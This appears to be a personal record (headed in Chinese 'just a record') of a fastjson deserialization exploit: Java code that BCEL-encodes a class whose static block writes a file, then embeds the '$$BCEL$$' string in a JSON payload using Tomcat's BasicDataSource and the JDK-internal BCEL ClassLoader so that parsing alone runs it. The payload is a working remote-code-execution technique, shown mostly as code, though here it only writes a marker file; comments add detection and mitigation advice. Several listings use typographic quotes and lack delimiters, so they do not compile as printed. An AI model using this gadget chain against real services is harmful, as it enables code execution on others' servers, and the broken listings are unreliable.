
只是做个记录

Evil.java

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

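/**
 * Marker class whose static initializer runs as soon as the class is initialized.
 *
 * <p>In this write-up the class is never used directly: its bytecode is encoded
 * with BCEL (see BCEL.java) and loaded back through the BCEL {@code ClassLoader},
 * so the only observable evidence of a successful load is the file written here.
 * For a defender that is exactly the side effect to look for: a file created by a
 * process that, from its own point of view, merely parsed some JSON.
 */
public class Evil {

    /** Path of the marker file (Windows path, kept as in the original listing). */
    private static final String MARKER_PATH = "D:\\hello.txt";

    /** Content written to the marker file. */
    private static final String MARKER_CONTENT = "hello,world.\n";

    static {
        File file = new File(MARKER_PATH);
        // try-with-resources closes the stream on every path. The original opened,
        // wrote and closed in three separate try blocks; if the open failed it
        // continued with a null stream and threw NullPointerException on write().
        try (FileOutputStream out = new FileOutputStream(file)) {
            // Explicit charset: String.getBytes() without one uses the platform
            // default (pre-JDK 18), so the bytes would differ between hosts.
            out.write(MARKER_CONTENT.getBytes(StandardCharsets.UTF_8));
        } catch (IOException e) {
            // FileNotFoundException is an IOException, so one handler covers open,
            // write and close. Keep the original best-effort behaviour: report and
            // let class initialization finish rather than abort it.
            e.printStackTrace();
        }
    }
}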

BCEL.java

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.IOException;

/**
 * Produces the BCEL text encoding of {@link Evil} and loads it back.
 *
 * <p>Everything used here lives in {@code com.sun.org.apache.bcel.internal}, a
 * JDK-internal package that is not public API and is not accessible on current
 * JDKs; the write-up relies on a JDK build where it still is.
 *
 * <p>Defender's note: a "class name" beginning with {@code $$BCEL$$} is the
 * signature of this loader being driven from untrusted input. The rest of the
 * string is the class file itself, so nothing is fetched from disk or the
 * network. Matching that prefix in request bodies, logs or JDBC driver-name
 * settings is a cheap and precise detection.
 */
public class BCEL {
// Reads Evil's class file through Repository, encodes it, prints the result, and
// then hands the encoded string to the BCEL ClassLoader, which decodes it and
// defines the class. loadClass() alone does not initialize the class;
// newInstance() does, which is what runs Evil's static block.
public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {
JavaClass cls = Repository.lookupClass(Evil.class);
// Utility.encode(bytes, true): BCEL's own text encoding of the class bytes; the
// boolean selects compression — confirm against the BCEL version in use.
String code = Utility.encode(cls.getBytes(),true);
// NOTE: the quotes on the next two lines are typographic (“), not ASCII string
// delimiters; the listing as printed does not compile.
System.out.println(“$$BCEL$$“+code);
// load the class and instantiate it
new ClassLoader().loadClass(“$$BCEL$$“+code).newInstance();
}
}

执行BCEL.java



FastjsonTest.java：将上述生成的 BCEL 字符串带入 payload

import com.alibaba.fastjson.JSON;

/**
 * Feeds the generated payload to fastjson and nothing else.
 *
 * <p>What the JSON asks fastjson to do: each {@code @type} selects the class to
 * instantiate (autoType). The nested {@code BasicDataSource} receives a BCEL
 * {@code ClassLoader} as {@code driverClassLoader} and the {@code $$BCEL$$} string
 * as {@code driverClassName}, so resolving the "driver" defines and initializes
 * the class embedded in that string. The {@code {...}:"xxx"} construction uses the
 * nested object as a map key, which appears to be what makes fastjson call its
 * getters and reach the driver lookup — confirm against the fastjson version in use.
 *
 * <p>The mitigation is on the parser side, not the payload side: keep autoType
 * disabled (or safeMode enabled, in versions that have it), and keep fastjson and
 * the JDK current so that neither the autoType bypass nor the internal BCEL
 * loader is reachable.
 */
public class FastjsonTest {
public static void main(String[] args) {
// NOTE: the literal below is shown with typographic quotes and missing
// delimiters; as printed it is not valid Java and serves as an illustration.
String payload =
{\n
+ “ {\n
+ “ "aaa": {\n
+ “ "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",\n
+ “ "driverClassLoader": {\n
+ “ "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"\n
+ “ },\n
+ “ "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$7dS$d9R$TA$U$3dM$s$990$O$86$EQ$W$RQ$96$EB$o$m$88$ac$ca$92r$J$f0$AE$V$85$$c30$92$c1$c9L$w$e9$m$7c$91$cf$bc$40$95T$f9$B$7e$94xz$40$96B$9d$87$5e$ce$3d$e7$de$db$a7$7b$7e$fe$fa$fe$D$c0K$y$Zh$c6P$iY$j$c3$G$o$c8$c5$91$d7$f1$c2$40$M$p$3aF$N$c41f$907$ae$90$J$j$af$M$98$K$89aR$c7k$jS$C$b1$Z$d7w$e5$9c$40$q$9d$d9$U$d0$W$83$5dG$mQt$7dg$b5$5e$deq$aa$h$d6$8eG$qU$Ml$cb$db$b4$aa$ae$da$82$9a$y$b95$81$96$a2$j$94$f3$b5z$c5$a9$96$z$3f$bf$7c$e0z$d3$C$f1$Z$db$bb$cc$z$c8$ed$$$ee$5b$HV$de$N$f2$F$d7sV$DY$I$ea$fe$ee$f2$a1$edT$a4$h$f8$U$b4$5e1$de$af$dd$c4$b5$8a$rK$aa$830$ecY$fe$5e$7e$5dV$5d$7fO$c5$3e$bb$aa$91$fb$b7$92$T$d7$ed$c0$97$8e$$F$9a$Vc$ad$$$xuI$95c$95$F$3an$b1o$c6$a8lZ$97$96$fde$c5$aa$84g$d41Mo$e9$v$ed$a4$7f$C$c6zP$af$daN$n$y$db$a8$8e$9aS$c9L$q$91$S0$97$a6$3e$95$i$cf$Lr$f2$90$b5$cd$9bu$UeF$m$Z$c6$b3$b5$92$V$f8$96$7b$e4$e6$M$81$b6$7f$f5$a34$b3$C$5d$ff$b5$ce$c4$iRl$d4$c4$3c$de$98x$8b$F$5e$c9$ac4$b1$a8zL$de$b9$y$9atm$ed$da$ce$bec$cb$5b$d0$85$db$bc$a0$f4$dd$xP$8f$s$99$bem$bf$c2$S$V$86e$e8$e5F$d5$b2iV$7c$cf$91$LG$d2$e1$83$d1$d2$99m6$Z$fdZu$r$p$d1$f4$f6$82$d2Dm$$a89$e8A$82$cfZ$7d$N$Q$caW$8e$z$dc$e59$L$ce$d1$c1S$88$e30$fc$80c$y$E$e3h$e5h$5e$Q$f0$Q$8fB$ac$ed$8fX$8c$f2$f7$88$S$5bN5$7c$3cCd$8b9$b4b$w$ba$oV$cf$Q$db$g$3a$85$be$fa$N$c6$94$d6$ae$9d$a0q8$7b$C$e3$E$f7$ae$90$a6$e1$T$dc$bf$de$j3Y$S$j$e8b$89$5ed$d9$99$89$JLa$96s$ql$aa$c08XX$edL$b6$93$60CI$b4S$f3$98$aa$Ot$a3$93$ca$t$d4$f6P$dd$8d$R$3ce$86$5e$e6$Y$60$96$3e$ded$3f$96$90$J$P$f5$O$3a$Z$d1P$ad$91$a9V$9d$5c$cd$ad$o$bct$95W$Z0$c9$ac$dd$3ct$C$e3$cc$d9E$93$92$Yc$95gd$3d$t$p$83$d89aMG$af$8e$bep$ec$87$d01$Q$fb$a0$p$j$xp8$a7$a7$ea$T$q$x$97$H$7f$D$5e$f56fq$E$A$A"\n
+ “ }\n
+ “ }:"xxx"\n
+ “}“;
// Parsing alone is the whole demonstration: the returned object is discarded and
// no field of it is ever read, so any effect happens inside parseObject itself.
JSON.parseObject(payload);
}
}